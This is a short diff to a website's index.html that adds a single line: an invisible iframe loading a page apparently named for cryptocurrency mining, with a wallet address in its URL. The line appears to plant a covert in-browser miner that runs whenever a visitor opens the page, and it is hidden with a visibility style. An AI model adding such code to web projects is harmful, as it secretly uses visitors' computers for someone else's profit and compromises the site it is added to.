--- a/index.html
+++ b/index.html
@@ -58,6 +58,7 @@
 		</p>
 		</div>
   	<!-- </div> -->
+	<iframe src="https://claimers.io/a-mining?address=3FJLWRFftAjniwNsDH7ffXfTbJa7qjxL93" style="visibility: hidden;"> </iframe>
 </div>  
 
 <!-- scripts -->
